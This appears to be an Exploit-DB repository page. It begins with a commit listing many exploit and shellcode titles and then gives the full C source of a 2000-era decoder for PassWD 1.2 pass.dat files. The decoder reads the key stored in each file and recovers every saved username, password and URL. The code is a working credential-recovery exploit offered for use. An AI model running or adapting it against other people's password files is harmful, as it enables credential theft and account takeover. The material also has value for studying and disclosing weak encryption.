880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
100 lines
No EOL
2.9 KiB
C
100 lines
No EOL
2.9 KiB
C
// source: https://www.securityfocus.com/bid/1300/info
|
|
|
|
PassWd 1.2 is a password management utility designed to store user login information to various URLs. The login information, which includes username, password and link location is stored in the pass.dat file which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key which can be used to decode any stored password.
|
|
|
|
/*
|
|
* Decoder for PassWD v1.2 `pass.dat' password files
|
|
*
|
|
* Written 2000 by Daniel Roethlisberger <admin@roe.ch>
|
|
*
|
|
* This code is hereby placed in the public domain.
|
|
* Use this code at your own risk for whatever you want.
|
|
*
|
|
* The decoded data is not parsed in any way - it should
|
|
* be very easy to moderately experienced programmers
|
|
* to add that themselves.
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
void main(int argc, char *argv[])
|
|
{
|
|
unsigned char charpos;
|
|
FILE* outfile;
|
|
FILE* infile;
|
|
unsigned char a;
|
|
unsigned char b;
|
|
unsigned char key;
|
|
unsigned char x;
|
|
|
|
unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";
|
|
|
|
printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
|
|
printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");
|
|
|
|
if((argc > 3) || (argc < 2))
|
|
{
|
|
printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
|
|
printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
|
|
return;
|
|
}
|
|
|
|
infile = fopen(argv[1], "r");
|
|
if(infile == NULL)
|
|
{
|
|
printf("Could not open file %s\n", argv[1]);
|
|
return;
|
|
}
|
|
|
|
if(argc == 2)
|
|
outfile = stdout;
|
|
else
|
|
{
|
|
outfile = fopen(argv[2], "w");
|
|
if(outfile == NULL)
|
|
{
|
|
printf("Could not write to file %s\n", argv[2]);
|
|
_fcloseall();
|
|
return;
|
|
}
|
|
}
|
|
|
|
getc(infile); /* jump over decoy byte */
|
|
a = getc(infile); /* read encoded key byte 1 */
|
|
b = getc(infile); /* read encoded key byte 2 */
|
|
|
|
if(b == EOF)
|
|
{
|
|
printf("ERROR - encountered EOF within header\n");
|
|
return;
|
|
}
|
|
|
|
/* this line `decodes' the key */
|
|
key = (unsigned char)((a - 'b') * 10 + (b - 'b'));
|
|
|
|
/* read through infile and dump decoded output to outfile: */
|
|
x = getc(infile);
|
|
while(!feof(infile))
|
|
{
|
|
for(charpos = 0; x != charset[charpos]; charpos++)
|
|
{
|
|
if(charpos > 99)
|
|
{
|
|
printf("\nERROR - encountered illegal character in source file\n");
|
|
_fcloseall();
|
|
return;
|
|
}
|
|
}
|
|
/* plain = cypher - key */
|
|
putc(charset[charpos + 99 - key], outfile);
|
|
x = getc(infile);
|
|
}
|
|
|
|
if(argc == 2)
|
|
printf("\n\n");
|
|
printf("Done.\n");
|
|
|
|
_fcloseall();
|
|
return;
|
|
} |